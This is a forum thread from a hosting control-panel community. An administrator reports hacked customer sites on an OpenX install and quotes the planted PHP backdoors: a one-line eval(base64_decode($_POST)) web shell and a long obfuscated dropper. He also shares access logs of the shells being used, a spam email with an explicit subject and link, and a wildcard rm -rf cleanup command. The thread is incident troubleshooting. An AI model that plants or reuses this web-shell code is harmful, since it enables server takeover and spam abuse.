MRatWork Forum by Mustafa Ramadhan
Sawo Project - Kloxo-MR Discussions => Kloxo-MR Bugs and Requests => Topic started by: Spacedust on 2014-11-07, 17:15:38
-
We've got some customers which accounts are hacked (not via FTP, but via web, but many different scripts).
There are additional files like files.php or options.php with content like:
<?php eval(base64_decode($_POST['n6ae4d5']));?>
or
<?php $r76="F[<PAlDf|]}M@~79/O8Kx\rH6r&-c5k\n3X,YzhQ> Cp\\wUu2jGoB;0i_SN\tn%Vg)ZI^sTRyvL{\$:=1*mE+JW(q4.t'`a!\"#edb?"; $GLOBALS['vtton6'] = $r76[94].$r76[24].$r76[24].$r76[49].$r76[24].$r76[54].$r76[24].$r76[94].$r76[41].$r76[49].$r76[24].$r76[87].$r76[53].$r76[58].$r76[61]; $GLOBALS['jlxru64'] = $r76[53].$r76[58].$r76[53].$r76[54].$r76[66].$r76[94].$r76[87]; $GLOBALS['vajox38'] = $r76[95].$r76[94].$r76[7].$r76[53].$r76[58].$r76[94]; $GLOBALS['qobdl72'] = $r76[36].$r76[70].$r76[27].$r76[45].$r76[61].$r76[76].$r76[31]; $GLOBALS['yhrfr40'] = $r76[20].$r76[69].$r76[36].$r76[20].$r76[58].$r76[15].$r76[46]; $GLOBALS['quzii24'] = $r76[78].$r76[95].$r76[28]; $GLOBALS['tlyiy12'] = $r76[27].$r76[49].$r76[45].$r76[58].$r76[87]; $GLOBALS['kyioa8'] = $r76[87].$r76[53].$r76[78].$r76[94]; $GLOBALS['glyac65'] = $r76[27].$r76[49].$r76[58].$r76[66].$r76[87].$r76[90].$r76[58].$r76[87]; $GLOBALS['nhnww15'] = $r76[58].$r76[41].$r76[45].$r76[7].$r76[53].$r76[23].$r76[76]; $GLOBALS['igajs32'] = $r76[41].$r76[49].$r76[87].$r76[27].$r76[27].$r76[76].$r76[76]; $GLOBALS['cpukq94'] = $r76[49].$r76[78].$r76[90].$r76[45].$r76[7].$r76[18].$r76[14]; $GLOBALS['bdonk12'] = $r76[36].$r76[43].$r76[61].$r76[96].$r76[49].$r76[18].$r76[18]; $GLOBALS['aurku4'] = $r76[53].$r76[49].$r76[20].$r76[61].$r76[49].$r76[46].$r76[15]; $GLOBALS['yqqkt30'] = $r76[7].$r76[45].$r76[58].$r76[27].$r76[87].$r76[53].$r76[49].$r76[58].$r76[54].$r76[94].$r76[20].$r76[53].$r76[66].$r76[87].$r76[66]; $GLOBALS['tnmsd36'] = $r76[78].$r76[90].$r76[53].$r76[5]; $GLOBALS['chqql44'] = $r76[90].$r76[24].$r76[78].$r76[87].$r76[20].$r76[31].$r76[46]; $GLOBALS['cvtxr40'] = $r76[94].$r76[27].$r76[69].$r76[43].$r76[66].$r76[31].$r76[52]; $GLOBALS['eavur97'] = $r76[45].$r76[66].$r76[5].$r76[94].$r76[94].$r76[41]; $GLOBALS['ptlaz26'] = $r76[45].$r76[24].$r76[70].$r76[7].$r76[45].$r76[14].$r76[18]; $GLOBALS['xcnkh30'] = $r76[20].$r76[5].$r76[5].$r76[94].$r76[35].$r76[52]; $GLOBALS['wnlxd28'] = $r76[87].$r76[24].$r76[53].$r76[78]; $GLOBALS['laepm94'] = $r76[41].$r76[24].$r76[94].$r76[61].$r76[54].$r76[24].$r76[94].$r76[41].$r76[5].$r76[90].$r76[27].$r76[94]; $GLOBALS['nxseo15'] = $r76[61].$r76[94].$r76[87].$r76[36].$r76[49].$r76[66].$r76[87].$r76[96].$r76[69].$r76[58].$r76[90].$r76[78].$r76[94]; $GLOBALS['cyzbs96'] = $r76[41].$r76[24].$r76[94].$r76[61].$r76[54].$r76[78].$r76[90].$r76[87].$r76[27].$r76[36]; $GLOBALS['yoejz48'] = $r76[24].$r76[35].$r76[94].$r76[29].$r76[61].$r76[31].$r76[15]; $GLOBALS['lzjpr73'] = $r76[43].$r76[95].$r76[87].$r76[47].$r76[7].$r76[23].$r76[18]; $GLOBALS['osnjl91'] = $r76[24].$r76[20].$r76[24].$r76[78].$r76[41].$r76[14].$r76[52]; $GLOBALS['zhjzv93'] = $r76[41].$r76[24].$r76[27].$r76[45].$r76[20].$r76[85].$r76[14]; $GLOBALS['brkww19'] = $r76[66].$r76[87].$r76[24].$r76[5].$r76[94].$r76[58]; $GLOBALS['yhcum29'] = $r76[49].$r76[69].$r76[69].$r76[66].$r76[61].$r76[18].$r76[52]; $GLOBALS['ibere91'] = $r76[7].$r76[49].$r76[7].$r76[87].$r76[61].$r76[46].$r76[14]; $GLOBALS['vszxc90'] = $r76[90].$r76[24].$r76[24].$r76[90].$r76[69].$r76[54].$r76[29].$r76[94].$r76[69].$r76[66]; $GLOBALS['qtgcq90'] = $r76[66].$r76[49].$r76[27].$r76[29].$r76[94].$r76[87].$r76[54].$r76[66].$r76[94].$r76[5].$r76[94].$r76[27].$r76[87]; $GLOBALS['bwpvf88'] = $r76[45].$r76[27].$r76[7].$r76[53].$r76[24].$r76[66].$r76[87]; $GLOBALS['bdvxl14'] = $r76[66].$r76[87].$r76[24].$r76[54].$r76[24].$r76[94].$r76[41].$r76[5].$r76[90].$r76[27].$r76[94]; $GLOBALS['xizmx47'] = $r76[53].$r76[58].$r76[53].$r76[54].$r76[61].$r76[94].$r76[87]; $GLOBALS['stkuy98'] = $r76[70].$r76[29].$r76[90].$r76[84].$r76[84].$r76[15].$r76[18]; $GLOBALS['duiid33'] = $r76[95].$r76[90].$r76[87].$r76[94]; $GLOBALS['grxdw62'] = $r76[61].$r76[94].$r76[87].$r76[78].$r76[20].$r76[24].$r76[24]; $GLOBALS['nvuxa92'] = $r76[69].$r76[96].$r76[94].$r76[43].$r76[69].$r76[18].$r76[18]; $GLOBALS['ysmvf63'] = $r76[78].$r76[53].$r76[58]; $GLOBALS['vbhwy58'] = ${$r76[54].$r76[3].$r76[17].$r76[55].$r76[67]}; $GLOBALS['wdbfr89'] = $r76[7].$r76[94].$r76[43].$r76[7].$r76[20].$r76[85].$r76[52]; $GLOBALS['vxogc32'] = $r76[41].$r76[24].$r76[94].$r76[61].$r76[54].$r76[66].$r76[41].$r76[5].$r76[53].$r76[87]; $GLOBALS['inenw32'] = $r76[20].$r76[43].$r76[66].$r76[94].$r76[66].$r76[46].$r76[85]; $GLOBALS['xyxdn38'] = $r76[27].$r76[36].$r76[24]; $GLOBALS['rtdlc97'] = $r76[49].$r76[24].$r76[95]; $GLOBALS['cnrfe78'] = $r76[45].$r76[24].$r76[5].$r76[95].$r76[94].$r76[27].$r76[49].$r76[95].$r76[94]; $GLOBALS['wzekj92'] = $r76[66].$r76[87].$r76[24].$r76[53].$r76[41].$r76[66].$r76[5].$r76[90].$r76[66].$r76[36].$r76[94].$r76[66]; $GLOBALS['yrqxp89'] = $r76[90].$r76[24].$r76[24].$r76[90].$r76[69].$r76[54].$r76[7].$r76[5].$r76[53].$r76[41]; $GLOBALS['xavtv19'] = $r76[41].$r76[24].$r76[94].$r76[61].$r76[54].$r76[78].$r76[90].$r76[87].$r76[27].$r76[36].$r76[54].$r76[90].$r76[5].$r76[5]; $GLOBALS['zjheh80'] = $r76[96].$r76[90].$r76[66].$r76[94].$r76[23].$r76[85].$r76[54].$r76[94].$r76[58].$r76[27].$r76[49].$r76[95].$r76[94]; $GLOBALS['gisxn89'] = $r76[66].$r76[49].$r76[27].$r76[29].$r76[94].$r76[87].$r76[54].$r76[27].$r76[24].$r76[94].$r76[90].$r76[87].$r76[94]; $GLOBALS['oqikt29'] = $r76[66].$r76[49].$r76[27].$r76[29].$r76[94].$r76[87].$r76[54].$r76[5].$r76[90].$r76[66].$r76[87].$r76[54].$r76[94].$r76[24].$r76[24].$
Then these files are executed remotely from different IP's:
37.139.47.122 - - [03/Nov/2014:05:15:09 +0100] "POST /reklamy/lib/max/Maintenance/Forecasting/info.php HTTP/1.0" 200 10804 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/24.0"
85.143.166.99 - - [03/Nov/2014:08:32:48 +0100] "POST /reklamy/lib/max/Maintenance/Forecasting/info.php HTTP/1.0" 200 10828 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/24.0"
37.139.47.122 - - [03/Nov/2014:11:56:25 +0100] "POST /reklamy/lib/max/Maintenance/Forecasting/info.php HTTP/1.0" 200 10960 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/24.0"
62.76.178.9 - - [03/Nov/2014:17:00:18 +0100] "POST /reklamy/lib/max/Maintenance/Forecasting/info.php HTTP/1.0" 200 12317 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/24.0"
then our mail queue is full of messages like this (we use limit 100 per hour, but it's annoying as help, as our mial servers IP is added to DNS blocklists):
--------------
MESSAGE NUMBER 793825
--------------
Received: (qmail 3373 invoked by uid 2513); 7 Nov 2014 11:08:54 -0000
Date: 7 Nov 2014 11:08:54 -0000
Message-ID: <20141107110854.3372.qmail@mail.xxx.pl>
To: rvkadam1980@gimail.com
Subject: Fw: LOL =) [ShiM] - Amateur russian mom fuck with teen - www.shimeon.altervista.org
From: "Meagan Payne" <meagan_payne@plotki.klik.net.pl>
Reply-To: "Meagan Payne" <meagan_payne@plotki.klik.net.pl>
X-Priority: 3 (Normal)
MIME-Version: 1.0
Content-Type: text/html; charset="iso-8859-1"
Content-Transfer-Encoding: 8bit
<h2><a href="http://BIOSTRUCTURES.NET/wp-content/plugins/categories-images/defines.html?cHRpY2ZjbzM7OjJCZWtvY2tuLGFtbw==">[ShiM] - Amateur russian mom fuck with teen - www.shimeon.altervista.org</a></h2>
<div>the polar cap. How do you know that the artifact was taken that way?"</div>
-
Inform here directory of file.php.
This issue also happens in CPanel account.
-
Inform here directory of file.php.
This issue also happens in CPanel account.
Here you are:
ls -l /home/httpd/plotki.klik.net.pl/httpdocs/reklamy/lib/max/Maintenance/Forecasting/
total 20K
drwxr-xr-x 3 piotr_k2_2004 piotr_k2_2004 4.0K Dec 3 2012 AdServer
-rw-r--r-- 1 piotr_k2_2004 piotr_k2_2004 4.3K Dec 3 2012 AdServer.php
drwxr-xr-x 2 piotr_k2_2004 piotr_k2_2004 4.0K Dec 3 2012 Channel
-rw-r--r-- 1 piotr_k2_2004 piotr_k2_2004 301 Sep 18 16:31 info.php
-
/home/httpd/<domain.com>/httpdocs just symlink for /home/<user>/<domain.com/
This symlink exists since Kloxo official. Didn't know it's importance or not.
-
For Kloxo-MR, fortunely no create this /home/httpd/<domain.com>/httpdocs. It's appear if created domain in Kloxo official and still exists if update to Kloxo-MR.
Remove this old directories with:
rm -rf /home/httpd/*/httpdocs
rm -rf /home/httpd/*/conf
-
It does not matter. The problem is how hackers are able to inject the code via web when permissions are fine and FTP wasn't hacked.
-
Plugin in wordpress.
-
Read http://cachecrew.com/fixing-an-infected-php-web-server/
-
@Spacedust, have you found the method used to inject these files? Was all accounts effected using wordpress?
Please inform here your investigations. Thank you.
-
@Spacedust, have you found the method used to inject these files? Was all accounts effected using wordpress?
Please inform here your investigations. Thank you.
No, they were not using Wordpress but they were using OpenX.
-
This is how they upload files !
-
that is backdoor calling with c99 shell. i think make safe mode php to make more secure.